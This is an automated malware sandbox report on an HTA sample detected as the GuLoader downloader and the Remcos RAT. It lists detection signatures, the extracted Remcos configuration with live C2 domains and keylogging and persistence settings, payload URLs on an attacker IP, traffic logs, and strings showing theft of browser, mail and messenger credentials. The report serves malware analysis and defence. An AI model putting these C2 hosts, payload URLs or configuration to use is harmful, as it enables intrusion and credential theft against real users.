Windows Analysis Report
PLOCMR-002 Dane dotycz#U0105ce dokument#U00f3w i towar#U00f3w.hta

Overview

General Information

Sample name: PLOCMR-002 Dane dotycz#U0105ce dokument#U00f3w i towar#U00f3w.hta
renamed because original name is a hash value
Original sample name: PLOCMR-002 Dane dotyczce dokumentw i towarw.hta
Analysis ID: 1435041
MD5: 86816f2832da46166cc3079c4c32a2d6
SHA1: a92657644d8dff7c7801eb465ca91e22767998b3
SHA256: 655f862dff56546606f574d6ca39a4f7dc0d3f5fc22d3f2e3cd3562e7c78a63e
Infos:

Detection

GuLoader, Remcos
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected GuLoader
Yara detected Remcos RAT
C2 URLs / IPs found in malware configuration
Found suspicious powershell code related to unpacking or dynamic code loading
Installs a global keyboard hook
Maps a DLL or memory area into another process
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: Wab/Wabmig Unusual Parent Or Child Processes
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Instant Messenger accounts or passwords
Tries to steal Mail credentials (via file / registry access)
Tries to steal Mail credentials (via file registry)
Uses dynamic DNS services
Very long command line found
Writes to foreign memory regions
Yara detected WebBrowserPassView password recovery tool
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Direct Autorun Keys Modification
Sigma detected: Potential Persistence Attempt Via Run Keys Using Reg.EXE
Sigma detected: Suspicious Powershell In Registry Run Keys
Sleep loop found (likely to delay execution)
Stores files to the Windows start menu directory
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Uses reg.exe to modify the Windows registry
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

Name Description Attribution Blogpost URLs Link
CloudEyE, GuLoader CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
Name Description Attribution Blogpost URLs Link
Remcos, RemcosRAT Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
  • UAC-0050
 https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos

AV Detection
barindex
Antivirus detection for URL or domain
Source: http://pesterbdd.com/images/Pester.png URL Reputation: Label: malware
Source: http://geoplugin.net/json.gp URL Reputation: Label: phishing
Source: jgbours284hawara01.duckdns.org Avira URL Cloud: Label: malware
Found malware configuration
Source: 0000000A.00000002.3229466080.0000000007337000.00000004.00000020.00020000.00000000.sdmp Malware Configuration Extractor: Remcos {"Host:Port:Password": "jgbours284hawara01.duckdns.org:3050:0jgbours284hawara01.duckdns.org:3051:1jgbours284hawara02.duckdns.org:3050:0", "Assigned name": "Protected", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Enable", "Hide file": "Disable", "Mutex": "jnbcourg-8XH6PE", "Keylog flag": "1", "Keylog path": "AppData", "Keylog file": "mvourhjs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Enable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
Multi AV Scanner detection for submitted file
Source: PLOCMR-002 Dane dotycz#U0105ce dokument#U00f3w i towar#U00f3w.hta ReversingLabs: Detection: 54%
Yara detected Remcos RAT
Source: Yara match File source: 0000000A.00000002.3229466080.0000000007337000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: wab.exe PID: 8024, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Roaming\mvourhjs.dat, type: DROPPED
Uses insecure TLS / SSL version for HTTPS connection
Source: unknown HTTPS traffic detected: 23.1.237.91:443 -> 192.168.2.5:49727 version: TLS 1.0
Source: unknown HTTPS traffic detected: 20.12.23.50:443 -> 192.168.2.5:49720 version: TLS 1.2
Source: unknown HTTPS traffic detected: 20.12.23.50:443 -> 192.168.2.5:49734 version: TLS 1.2
Source: Binary string: \??\C:\Windows\symbols\dll\System.Core.pdb source: powershell.exe, 00000005.00000002.2590121491.000000000831A000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2587009002.0000000007134000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdbw source: powershell.exe, 00000005.00000002.2587009002.00000000071A8000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: notepad.pdbGCTL source: mshta.exe, 00000000.00000003.1998389233.0000000008651000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1995220103.00000000085CD000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb5 source: powershell.exe, 00000005.00000002.2587009002.0000000007146000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: indows\System.Core.pdb source: powershell.exe, 00000005.00000002.2587009002.00000000071A8000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdbeKug source: powershell.exe, 00000005.00000002.2587009002.00000000071A8000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Core.pdb source: powershell.exe, 00000005.00000002.2576907258.0000000002DC3000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Core.pdbk source: powershell.exe, 00000005.00000002.2576907258.0000000002DC3000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_22C910F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose, 10_2_22C910F1
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_22C96580 LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,FindFirstFileExA, 10_2_22C96580
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 16_2_0040AE51 FindFirstFileW,FindNextFileW, 16_2_0040AE51
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 19_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen, 19_2_00407EF8
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 22_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen, 22_2_00407898

Networking
barindex
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: jgbours284hawara01.duckdns.org
Uses dynamic DNS services
Source: unknown DNS query: name: jgbours284hawara01.duckdns.org
Source: unknown DNS query: name: jgbours284hawara02.duckdns.org
Detected TCP or UDP traffic on non-standard ports
Source: global traffic TCP traffic: 192.168.2.5:49731 -> 45.88.90.110:3050
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 45.88.90.110 45.88.90.110
Source: Joe Sandbox View IP Address: 239.255.255.250 239.255.255.250
Source: Joe Sandbox View IP Address: 87.121.105.163 87.121.105.163
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: LVLT-10753US LVLT-10753US
Source: Joe Sandbox View ASN Name: WOWUS WOWUS
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 1138de370e523e824bbca92d049a3777
Source: Joe Sandbox View JA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
Uses insecure TLS / SSL version for HTTPS connection
Source: unknown HTTPS traffic detected: 23.1.237.91:443 -> 192.168.2.5:49727 version: TLS 1.0
Source: unknown TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: global traffic HTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlKHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /async/ddljson?async=ntp:2 HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlKHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /async/newtab_promos HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /sorry/index?continue=https://www.google.com/async/newtab_ogb%3Fhl%3Den-US%26async%3Dfixed:0&hl=en-US&q=EgS_YJbhGMiZy7EGIjBhRj7IuadU0gbq76nmijOz5rJlabhPhKgsZ7QxpWJU2pGaolQtvo8xHffhXVqTQ4YyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlKHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: 1P_JAR=2024-05-01-23; NID=513=Q1QUuPoP5fiffsxnHX7HU6RtQBqmxviW_6ILXd3jNP98QQJCtzR2tDO3F5Bby44iwt6_E-RtM3O0KyBD8u8pVVmpfkL9O1UQZs-wW6FMNXT1Xn-HjQtRaldRTuZ5l3PDmgoOX2iKCv2sE_S80s-0l_WPRIMsOB_cq-G9-m46R4o
Source: global traffic HTTP traffic detected: GET /sorry/index?continue=https://www.google.com/async/newtab_promos&q=EgS_YJbhGMiZy7EGIjA7qK4Mr9pBN6mKzvK2lTskjhTK6lIPUikSw97szio8blseDN54zxFJKYhz_ihMLFIyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: 1P_JAR=2024-05-01-23; NID=513=Q1QUuPoP5fiffsxnHX7HU6RtQBqmxviW_6ILXd3jNP98QQJCtzR2tDO3F5Bby44iwt6_E-RtM3O0KyBD8u8pVVmpfkL9O1UQZs-wW6FMNXT1Xn-HjQtRaldRTuZ5l3PDmgoOX2iKCv2sE_S80s-0l_WPRIMsOB_cq-G9-m46R4o
Source: global traffic HTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=4LRrbP6CoH7uBLr&MD=X1ONPB1b HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global traffic HTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=4LRrbP6CoH7uBLr&MD=X1ONPB1b HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global traffic HTTP traffic detected: GET /Subumbilical.dwp HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: 87.121.105.163Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /DtExZZndAxdvvlCKCcIVF127.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: 87.121.105.163Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
Source: wab.exe, 0000000A.00000002.3241465613.0000000022C60000.00000040.10000000.00040000.00000000.sdmp, wab.exe, 00000016.00000002.2629763213.0000000000400000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: Software\America Online\AOL Instant Messenger (TM)\CurrentVersion\Users%s\Loginprpl-msnprpl-yahooprpl-jabberprpl-novellprpl-oscarprpl-ggprpl-ircaccounts.xmlaimaim_1icqicq_1jabberjabber_1msnmsn_1yahoogggg_1http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com equals www.ebuddy.com (eBuggy)
Source: wab.exe, wab.exe, 00000016.00000002.2629763213.0000000000400000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.ebuddy.com equals www.ebuddy.com (eBuggy)
Source: wab.exe String found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
Source: wab.exe, 00000010.00000003.2642937778.00000000029EA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: nts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.facebook.com (Facebook)
Source: wab.exe, 00000010.00000003.2642937778.00000000029EA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: nts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.yahoo.com (Yahoo)
Source: wab.exe, 0000000A.00000002.3241755873.0000000023440000.00000040.10000000.00040000.00000000.sdmp, wab.exe, 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.facebook.com (Facebook)
Source: wab.exe, 0000000A.00000002.3241755873.0000000023440000.00000040.10000000.00040000.00000000.sdmp, wab.exe, 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.yahoo.com (Yahoo)
Source: global traffic DNS traffic detected: DNS query: www.google.com
Source: global traffic DNS traffic detected: DNS query: jgbours284hawara01.duckdns.org
Source: global traffic DNS traffic detected: DNS query: jgbours284hawara02.duckdns.org
Source: global traffic DNS traffic detected: DNS query: geoplugin.net
Source: unknown HTTP traffic detected: POST /threshold/xls.aspx HTTP/1.1Origin: https://www.bing.comReferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/InitAccept: */*Accept-Language: en-CHContent-type: text/xmlX-Agent-DeviceId: 01000A410900D492X-BM-CBT: 1696428841X-BM-DateFormat: dd/MM/yyyyX-BM-DeviceDimensions: 784x984X-BM-DeviceDimensionsLogical: 784x984X-BM-DeviceScale: 100X-BM-DTZ: 120X-BM-Market: CHX-BM-Theme: 000000;0078d7X-BM-WindowsFlights: FX:117B9872,FX:119E26AD,FX:11C0E96C,FX:11C6E5C2,FX:11C7EB6A,FX:11C9408A,FX:11C940DB,FX:11CB9A9F,FX:11CB9AC1,FX:11CC111C,FX:11D5BFCD,FX:11DF5B12,FX:11DF5B75,FX:1240931B,FX:124B38D0,FX:127FC878,FX:1283FFE8,FX:12840617,FX:128979F9,FX:128EBD7E,FX:129135BB,FX:129E053F,FX:12A74DB5,FX:12AB734D,FX:12B8450E,FX:12BD6E73,FX:12C3331B,FX:12C7D66EX-Device-ClientSession: DB0AFB19004F47BC80E5208C7478FF22X-Device-isOptin: falseX-Device-MachineId: {92C86F7C-DB2B-4F6A-95AD-98B4A2AE008A}X-Device-OSSKU: 48X-Device-Touch: falseX-DeviceID: 01000A410900D492X-MSEdge-ExternalExp: d-thshld39,d-thshld42,d-thshld77,d-thshld78,staticshX-MSEdge-ExternalExpType: JointCoordX-PositionerType: DesktopX-Search-AppId: Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUIX-Search-CortanaAvailableCapabilities: NoneX-Search-SafeSearch: ModerateX-Search-TimeZone: Bias=-60; DaylightBias=-60; TimeZoneKeyName=W. Europe Standard TimeX-UserAgeClass: UnknownAccept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045Host: www.bing.comContent-Length: 2484Connection: Keep-AliveCache-Control: no-cacheCookie: MUID=2F4E96DB8B7049E59AD4484C3C00F7CF; _SS=SID=1A6DEABB468B65843EB5F91B47916435&CPID=1714605232991&AC=1&CPH=d1a4eb75; _EDGE_S=SID=1A6DEABB468B65843EB5F91B47916435; SRCHUID=V=2&GUID=3D32B8AC657C4AD781A584E283227995&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20231004; SRCHHPGUSR=SRCHLANG=en&IPMH=986d886c&IPMID=1696428841029&HV=1696428756; CortanaAppUID=5A290E2CC4B523E2D8B5E2E3E4CB7CB7; MUIDB=2F4E96DB8B7049E59AD4484C3C00F7CF
Source: powershell.exe, 00000001.00000002.2770000985.0000000004ADB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2770000985.0000000004F0F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://87.121.105.163
Source: wab.exe, 0000000A.00000002.3241007927.00000000227C0000.00000004.00001000.00020000.00000000.sdmp, wab.exe, 0000000A.00000002.3229466080.0000000007337000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://87.121.105.163/DtExZZndAxdvvlCKCcIVF127.bin
Source: wab.exe, 0000000A.00000002.3229466080.0000000007337000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://87.121.105.163/DtExZZndAxdvvlCKCcIVF127.bin/u
Source: wab.exe, 0000000A.00000002.3229466080.0000000007337000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://87.121.105.163/DtExZZndAxdvvlCKCcIVF127.binCu
Source: wab.exe, 0000000A.00000002.3229466080.00000000072F8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://87.121.105.163/DtExZZndAxdvvlCKCcIVF127.binE
Source: wab.exe, 0000000A.00000002.3241007927.00000000227C0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://87.121.105.163/DtExZZndAxdvvlCKCcIVF127.binLysrsRafduelvalenza.it/DtExZZndAxdvvlCKCcIVF127.bi
Source: powershell.exe, 00000001.00000002.2770000985.0000000004ADB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2577173319.00000000048CB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://87.121.105.163/Subumbilical.dwpXR
Source: powershell.exe, 00000001.00000002.2770000985.0000000004F0F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://87.121.108
Source: bhv5CE7.tmp.16.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: bhv5CE7.tmp.16.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0B
Source: svchost.exe, 00000003.00000002.3226864730.0000021BB3E00000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.ver)
Source: bhv5CE7.tmp.16.dr String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl0
Source: bhv5CE7.tmp.16.dr String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: bhv5CE7.tmp.16.dr String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
Source: svchost.exe, 00000003.00000002.3227207606.0000021BB3E8C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.3223807080.0000004D6CC7B000.00000004.00000010.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.2743509012.0000021BB3CE2000.00000004.00000800.00020000.00000000.sdmp, edb.log.3.dr String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYTBmQUFZUHRkSkgtb01u
Source: qmgr.db.3.dr String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
Source: qmgr.db.3.dr String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
Source: qmgr.db.3.dr String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
Source: qmgr.db.3.dr String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
Source: qmgr.db.3.dr String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
Source: qmgr.db.3.dr String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
Source: svchost.exe, 00000003.00000002.3227207606.0000021BB3E8C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://edgedl.me.gvt1.com:80/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYTBmQUFZUHRkSkgtb
Source: svchost.exe, 00000003.00000002.3227207606.0000021BB3E8C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://edgedl.me.gvt1.com:80IO:ID:
Source: edb.log.3.dr String found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
Source: wab.exe, 0000000A.00000002.3229466080.0000000007337000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://geoplugin.net/
Source: wab.exe, 0000000A.00000002.3229466080.0000000007337000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://geoplugin.net/i
